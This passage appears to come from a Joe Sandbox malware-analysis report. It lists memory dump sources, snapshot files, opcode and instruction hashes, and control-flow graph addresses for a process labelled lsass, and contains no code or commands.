                                        control_flow_graph 111 7ffd9bac9b39-7ffd9bac9b64 112 7ffd9bac9b68-7ffd9bac9b6d 111->112
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9bac3000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: I
                                        • API String ID: 0-3707901625
                                        • Opcode ID: cb2716b927e0573be4256e2eb57890cd645b1c512b6bce0cf1e580e8a826d4b2
                                        • Instruction ID: 46131faacf7d0d944c98bf334291b1a0d953027abc10341bf66ba9c321a6d6ce
                                        • Opcode Fuzzy Hash: cb2716b927e0573be4256e2eb57890cd645b1c512b6bce0cf1e580e8a826d4b2
                                        • Instruction Fuzzy Hash: 73E0126154E3C44FCB0AEB7488698553FA0AE6B21078B40EEC186CF2B3E62DC949C701

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 113 7ffd9bac9ce9-7ffd9bac9d14 115 7ffd9bac9d18-7ffd9bac9d1d 113->115
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9bac3000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: I
                                        • API String ID: 0-3707901625
                                        • Opcode ID: b4aac325a864865cc2f085eadbe5bd1fb04963acf1403d34d14f580ae8c616b9
                                        • Instruction ID: bb57b4b67300a1035811d329e12cffce58d2000cb4c74842f86b4850881fc77e
                                        • Opcode Fuzzy Hash: b4aac325a864865cc2f085eadbe5bd1fb04963acf1403d34d14f580ae8c616b9
                                        • Instruction Fuzzy Hash: 13E01A7194E7C44FCB16EB7588AA9547FA1EF6721078B40EEC085CF1B3E62D8849C701

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 120 7ffd9bea0ff9-7ffd9bea1024 122 7ffd9bea1028-7ffd9bea102d 120->122
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: I
                                        • API String ID: 0-3707901625
                                        • Opcode ID: 5ef4501469642ab71cb921a2cbfe7b3ea37f4b5fb937bb49431145dddac97153
                                        • Instruction ID: 9e12f8af956b37235a26c66ba1f7897a132f1aa5e64652999e93831eab0a2463
                                        • Opcode Fuzzy Hash: 5ef4501469642ab71cb921a2cbfe7b3ea37f4b5fb937bb49431145dddac97153
                                        • Instruction Fuzzy Hash: 17E012A154F7C44FC716EB7488798447FA19E6731178B41EEC146CF1B3E62D8949C701
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2041754636.00007FFD9BC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9bc00000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 077a0d1459e0381491069a711d34d95c7bd2821d753ea34ba2b665f30f4bd2b8
                                        • Instruction ID: 9c126d37bf5444528e02cf50d49bf6760f17c0ded749834abfe045349be098e9
                                        • Opcode Fuzzy Hash: 077a0d1459e0381491069a711d34d95c7bd2821d753ea34ba2b665f30f4bd2b8
                                        • Instruction Fuzzy Hash: 1E528371A1DA5D4FDF98EB58C8A5AA8B7F1FF68354F0441E9E04DC3292CA397D808B41
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16d9a81f6dc08137ffff95ac3a3b44db2d00351a78debeb611e88c6957dc6fbe
                                        • Instruction ID: 50e5f2081c6fe8cc72c6f19b75f5c4312a6cd475c4e9fc0c0cd54c1dae1563af
                                        • Opcode Fuzzy Hash: 16d9a81f6dc08137ffff95ac3a3b44db2d00351a78debeb611e88c6957dc6fbe
                                        • Instruction Fuzzy Hash: B0F1E2306196498FEB68CF58C4E06B53BB1FF49301F5442BDC84ACB69BDA39E985CB41
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 47ed1cf8858ea71a11c372e55005ab9fd91ce4a7d0d4a3df4f2943bf6592ab5e
                                        • Instruction ID: 99d97d2b1443ac3eec3decb54336a9bba63504279164a67ec2e9d5c86b8a149b
                                        • Opcode Fuzzy Hash: 47ed1cf8858ea71a11c372e55005ab9fd91ce4a7d0d4a3df4f2943bf6592ab5e
                                        • Instruction Fuzzy Hash: 75D13530A0EB0A8FE379DB68D4A157577F0FF45300B25057EC44EC36A6DA2AB94A8B41
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e6b91acc27d1e571c001089f71f30ea3b42412ce073dba5c0c59598f67e56c2f
                                        • Instruction ID: fa624c396da8bdefd19df1ab0f6c2e4f4477b1f94720fe0c82df0207def71374
                                        • Opcode Fuzzy Hash: e6b91acc27d1e571c001089f71f30ea3b42412ce073dba5c0c59598f67e56c2f
                                        • Instruction Fuzzy Hash: F8B11630A0964D8FDB58EF68C865AF97BE1FF56310F04417BD44DC71A2CA74A845CB90
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f13a8dfcb0bd115a07c2f4549f901ed3f175266e31db7d8bbd858f8ef9a42122
                                        • Instruction ID: 255bae0f4ad1529d4bc205a102c3d77631e57baf6b787807f8c16c674b024cce
                                        • Opcode Fuzzy Hash: f13a8dfcb0bd115a07c2f4549f901ed3f175266e31db7d8bbd858f8ef9a42122
                                        • Instruction Fuzzy Hash: 24C1033061A64A8BEB2DCF58C0E05B137B1FF45301B5546BDC88B8B69BDA39F985CB41
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d12b8a78353ddbc51a3e7d6e2f1e7f568307dcf60fa821745b977012a84f99c8
                                        • Instruction ID: 8926859c2e87c2d9518e964f82e3510ea393299830191d3989765b9d610f08f7
                                        • Opcode Fuzzy Hash: d12b8a78353ddbc51a3e7d6e2f1e7f568307dcf60fa821745b977012a84f99c8
                                        • Instruction Fuzzy Hash: BAB1363070EA4A9FE36ADB68C4A16B4B7A1FF49300F4541BDC04EC7A97DB29B955C780
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9bac3000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 619bbbc0499b63a0758ed3a05cba198c1c10988b8f6a859cafc2dde918f5a74f
                                        • Instruction ID: cd2fedf50f050afa81a6c3ae8ae69c4272bafc4cfb29f91f2159799a2c2cd292
                                        • Opcode Fuzzy Hash: 619bbbc0499b63a0758ed3a05cba198c1c10988b8f6a859cafc2dde918f5a74f
                                        • Instruction Fuzzy Hash: 28A1AF70B1890D4FDB55FB68C4A8AB977E1FF98314F514679E01EC72A6DF38A8428780
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 99cbdccb923369d9cb793d4f74fb607b589ba0ea718cc31acc4528a2dc0fbf76
                                        • Instruction ID: 00dde0e822e7f1bbada33351e549770bd4b6c186b925449e75703dda4e99c1dc
                                        • Opcode Fuzzy Hash: 99cbdccb923369d9cb793d4f74fb607b589ba0ea718cc31acc4528a2dc0fbf76
                                        • Instruction Fuzzy Hash: DF21F902F0F29BA6F675A1E928310FC16485F59238F2A02B6D49D850F3DC0E36895383
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b5e9a9a0cdc74916bb816cba8eecd0aeda4bb604197385ecab826e043af58201
                                        • Instruction ID: 1a716149d8d6b91ef292e25f7118398dcf832f149297626b19802b16c213dd1f
                                        • Opcode Fuzzy Hash: b5e9a9a0cdc74916bb816cba8eecd0aeda4bb604197385ecab826e043af58201
                                        • Instruction Fuzzy Hash: 34819A31B1EB4A4FEB3D9BA894615B977E4FF45300F16017ED48EC31A2DE2AB50A8741
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 18b355c9b04606de1d0fec1dbc03e50c0cb59c4d5b64c0d794b2c9416933178b
                                        • Instruction ID: f59914bac7e86e04828dde15e1f6ca85cb29bf7b9d988123bb18a9f2a8707c30
                                        • Opcode Fuzzy Hash: 18b355c9b04606de1d0fec1dbc03e50c0cb59c4d5b64c0d794b2c9416933178b
                                        • Instruction Fuzzy Hash: EC714A31A0E58D4FE778DA5888669B837D4FF44310B1502B9D49FC75B3DE1AAE0E8782
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 24a5b9948674444a75df47333babf3b201c123351d546950e64b4aca1afc3467
                                        • Instruction ID: c7ad7b84095d504777eacf9e63784cc052536b155f4e2d5dc0e8e9b8a54f31a0
                                        • Opcode Fuzzy Hash: 24a5b9948674444a75df47333babf3b201c123351d546950e64b4aca1afc3467
                                        • Instruction Fuzzy Hash: 6281E230E1E64EEFEB69DBA488606FC7BA5EF45300F1105B9D01EC71E6EA296945C702
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8e7caf1cff0ce8db7bc2e261e2aa7ebeb42e2e944f14d75ab313248aca64c916
                                        • Instruction ID: 146b4aeb97b178ac49a2fde6ed2062f7d96d5800a017d2a300c9140db023fb5c
                                        • Opcode Fuzzy Hash: 8e7caf1cff0ce8db7bc2e261e2aa7ebeb42e2e944f14d75ab313248aca64c916
                                        • Instruction Fuzzy Hash: CB516120B1995D4FE7A8FB68C4AA6B873D2FF98710F4141B9E40DC32E2DD296D458781
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3d7da9bb43db139e57fd48fe4311c5889e53862978ca359c542ab04b8f779cfd
                                        • Instruction ID: 16d363e577bc85e899e2799fcda29c78ccbb8f70df69b26c04e48ca61c52a0cf
                                        • Opcode Fuzzy Hash: 3d7da9bb43db139e57fd48fe4311c5889e53862978ca359c542ab04b8f779cfd
                                        • Instruction Fuzzy Hash: 2F415622B0C5590FE318F7BCA4A5AF97781EF9933AB0445BBE44ECB1D7CD18A841C284
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e3c4e9649354bb7d41b9191a7432888d1cbd5ea5ad65f164ca3644a36f4691f
                                        • Instruction ID: fd8dc445c82cd57217f4fbd0a080b43b741862e3a170948aa8c1bc658b6d646b
                                        • Opcode Fuzzy Hash: 1e3c4e9649354bb7d41b9191a7432888d1cbd5ea5ad65f164ca3644a36f4691f
                                        • Instruction Fuzzy Hash: 7041E422B0C5590FE358B7BCA4A99F87781EF5933AB1445BBE44ECA1D7DD18A841C284
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 53789e7afff5cd272ce38db2a62ac8fb3f07bae3ca14fead55862fe8f788d847
                                        • Instruction ID: a78fd0393df798a5d7279520be512a743bf2127073ff4ee9a1b140aa62e7e610
                                        • Opcode Fuzzy Hash: 53789e7afff5cd272ce38db2a62ac8fb3f07bae3ca14fead55862fe8f788d847
                                        • Instruction Fuzzy Hash: E241563270C9088FDF98FF18C499DA577D1FB68325B04416AD44AC7592DE35F945CB81
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f899e6017b279f002557cf9653e2fe417b6fe7911341195e6d1a70a36e27f2af
                                        • Instruction ID: f8554eb8eef723803981f61325eb2d8f2d4eadc5cd94e559fe1cbe599860c002
                                        • Opcode Fuzzy Hash: f899e6017b279f002557cf9653e2fe417b6fe7911341195e6d1a70a36e27f2af
                                        • Instruction Fuzzy Hash: B1414F3160D9098FDF98FB18C469EA473E1FFA9724B0441AAD04EC7692DE35F845CB81
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0a88c06ca4f2400937054b732fd576d3b1568744e9d3f298907855179ff43efd
                                        • Instruction ID: 029ae9470ff4a95a95a81218183b26ab44b2d58cd3f418e2d853f6a538648568
                                        • Opcode Fuzzy Hash: 0a88c06ca4f2400937054b732fd576d3b1568744e9d3f298907855179ff43efd
                                        • Instruction Fuzzy Hash: 4531733160CA488FDF98FF28C8A9D6477E1FF68325B0442A9D45AC75A2DE35F845CB81
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c8ca3423f8c3bc6e2421ea907feadfd738972e3a3d503534f6951d81ca91536e
                                        • Instruction ID: 9abb39346e284c97d38773f5c280437349c6dce7d0a03c004e85baffe01b4227
                                        • Opcode Fuzzy Hash: c8ca3423f8c3bc6e2421ea907feadfd738972e3a3d503534f6951d81ca91536e
                                        • Instruction Fuzzy Hash: 22316F3160C9488FDF5CFB18C469EA477E1FFA931470442AAD05AC7692DE25F845CB81
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0bbb8f13feb3d878b3583799f9ecaf0d3080ba59e3a859bee52442560068c643
                                        • Instruction ID: 1892ba1e47363df55a2d16a3820472643fa28bbee2585e90118b8e959b388cb9
                                        • Opcode Fuzzy Hash: 0bbb8f13feb3d878b3583799f9ecaf0d3080ba59e3a859bee52442560068c643
                                        • Instruction Fuzzy Hash: C531F721B1C91D0FE368B76C646AAF973C2DF5832AF0045BBE40EC71D7DD18AC418294
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9a9a7893c479c20d253ad4ec85a4d6dc214feb556bcca5455f6cdd449134fd8e
                                        • Instruction ID: 00b8afb224162b1e5ecaf61e80ae9d8705cd0d32d259a62de48398c8e4f207c4
                                        • Opcode Fuzzy Hash: 9a9a7893c479c20d253ad4ec85a4d6dc214feb556bcca5455f6cdd449134fd8e
                                        • Instruction Fuzzy Hash: DD31F042A0FBC50FD72642B91C290A67FA0AF5265031D42FFE1D89A5F7DA49AD4D8383
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c74f1181c56e331568ea63d1ee350c86884ad9b7ae3b7d596a9264504d5f3c92
                                        • Instruction ID: 3f145b964f7af795a933f622a88481b2e3ed4765e794f79165cc134d43e93385
                                        • Opcode Fuzzy Hash: c74f1181c56e331568ea63d1ee350c86884ad9b7ae3b7d596a9264504d5f3c92
                                        • Instruction Fuzzy Hash: 6131523160CA098FDF98FF28C4A9DA5B7E1FB68314B0442A9D44AC75A2DE35F945CB81
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 105415f72ffdbdb86ec84aa0816da059fb6ee7a9218355fd309d666f00203f39
                                        • Instruction ID: b52cd4abfc2a1d71248914382ad89b4612f011dc94bbbdf9f4721452beb9a211
                                        • Opcode Fuzzy Hash: 105415f72ffdbdb86ec84aa0816da059fb6ee7a9218355fd309d666f00203f39
                                        • Instruction Fuzzy Hash: D2314F3160C9498FDF6CFB18C469EA473E1FFA971470441AAD04AC7692DE25F885CB81
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cee8aa3457856ca768d197e48d4d55c8c2c9e24c5897a3c1ccdebd3fb61a2d84
                                        • Instruction ID: f2a28cb2a7aa03034fee5b30895ec370e3737cc0692dbc93d285df5e05444067
                                        • Opcode Fuzzy Hash: cee8aa3457856ca768d197e48d4d55c8c2c9e24c5897a3c1ccdebd3fb61a2d84
                                        • Instruction Fuzzy Hash: 07318D30A0EA4ECFEBA8DF9484615BD77B4FF44B01F91017AD00EC21A2DB3A6E448745
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ab646dd548d444271d98a662cc97503e4e20e350f003acff61802e812924afb5
                                        • Instruction ID: 9379b1c3f243dd6740c60596d750efe600d48d00c0dba30911f9b5deba5c7356
                                        • Opcode Fuzzy Hash: ab646dd548d444271d98a662cc97503e4e20e350f003acff61802e812924afb5
                                        • Instruction Fuzzy Hash: B5318D30E1E60ECFEBA8DB9484665BD77F5FF44301F51007AD40FC21A2DA3A6A488B41
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ecb48d7edd7cc99cdca2fc5bff09fe71bb9386699a0f222b41c69865cb08453a
                                        • Instruction ID: 02f7ca7e2d4af192edd636b97ea36489d0d19e037f38c4a2691c821ab1ad2b08
                                        • Opcode Fuzzy Hash: ecb48d7edd7cc99cdca2fc5bff09fe71bb9386699a0f222b41c69865cb08453a
                                        • Instruction Fuzzy Hash: F731A671B09A0E5BDB58DBACC4665BCF7A1FF44310B554239D04AD3296DF247912CB80
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f6028f649cc811efd3648019a2ee4d68182c00139fc0cf788d372697e9d3fb28
                                        • Instruction ID: 6853346d5d69d3f612e822dbd714885bd39361037c0492fb8671af6dae528d73
                                        • Opcode Fuzzy Hash: f6028f649cc811efd3648019a2ee4d68182c00139fc0cf788d372697e9d3fb28
                                        • Instruction Fuzzy Hash: 88214620B1891D0FE798F76C946AA7972C3EF98324F4040BEE40EC32E7DD58AC418295
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a3793533556954fc6b87386c50c90dbfdd44c1feb49d1ba0cc142826ec43ac8
                                        • Instruction ID: 24a0733fb0df3a694f03a834dfb276a56665b5dad4dac5f057217f0d9bcb4014
                                        • Opcode Fuzzy Hash: 2a3793533556954fc6b87386c50c90dbfdd44c1feb49d1ba0cc142826ec43ac8
                                        • Instruction Fuzzy Hash: 98210621F0E78D4FEF69A7E894662F87BE5EF55314F150179D08EC21D3DA1AA90A8340
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 15ea57fb49a89f53cae2fb362b50d42ec611eb9c66de8de79f312da9b8c1a6b6
                                        • Instruction ID: b240ad78e21f12e361764895f69e6db6940e9d888ce53b8284f13d3d7ddfce40
                                        • Opcode Fuzzy Hash: 15ea57fb49a89f53cae2fb362b50d42ec611eb9c66de8de79f312da9b8c1a6b6
                                        • Instruction Fuzzy Hash: 01317810A1E5DA4BE33AD76848B49B47B75EF5630171D46FEC09ACB4E7C82DBA88C341
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b1080a6d2f2b61bb872a9b664798cce5a5671516d23f399d0dfa631f87aeb81b
                                        • Instruction ID: 80057b5abdf149fbd0b6a111fb12875dec10ed8861b6fe5436591eee230bf0ca
                                        • Opcode Fuzzy Hash: b1080a6d2f2b61bb872a9b664798cce5a5671516d23f399d0dfa631f87aeb81b
                                        • Instruction Fuzzy Hash: F921F821B0EA4D4FE354EBB888A477473D1EF99314F0582BAD00DCB2E7CE6D69498341
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 99b0bcd1f3fc8372a06d709e5e7a10dfd24fe91f58af2e23a1e6b671c003657f
                                        • Instruction ID: 5bc38230dc4480a22edf620031fe9e4d437d6a8782cfa65fedf0a04d9d863ead
                                        • Opcode Fuzzy Hash: 99b0bcd1f3fc8372a06d709e5e7a10dfd24fe91f58af2e23a1e6b671c003657f
                                        • Instruction Fuzzy Hash: 9B210736B0D64D8AE732ABA898510DC7B60EF81325F0545B3D04CCF1D3D968264AC7A5
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5666c3f6486c7aa80c8778b1a83fe85014bf87a840ddf9f364e334d3c5092cfd
                                        • Instruction ID: 59b81b7feaacfc229d649e20268329367fa3ee3a9e6707611b138ae11755d3ce
                                        • Opcode Fuzzy Hash: 5666c3f6486c7aa80c8778b1a83fe85014bf87a840ddf9f364e334d3c5092cfd
                                        • Instruction Fuzzy Hash: EA21FB31E0991D9FDF98EB58C865AEDB7B1FF58304F0041A9D04EE32A1CE35A944CB41
                                        Memory Dump Source
                                        • Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 008fb3e3c86ae656f875ee9a84c7b9f44b7fa2b4bc75c7723e07fac6ec0e5dc8
                                        • Instruction ID: 4ba56a04fd82ef4ea02f8e013cbbe9b1595450ab820b721ee6e98ee2f0aa0971
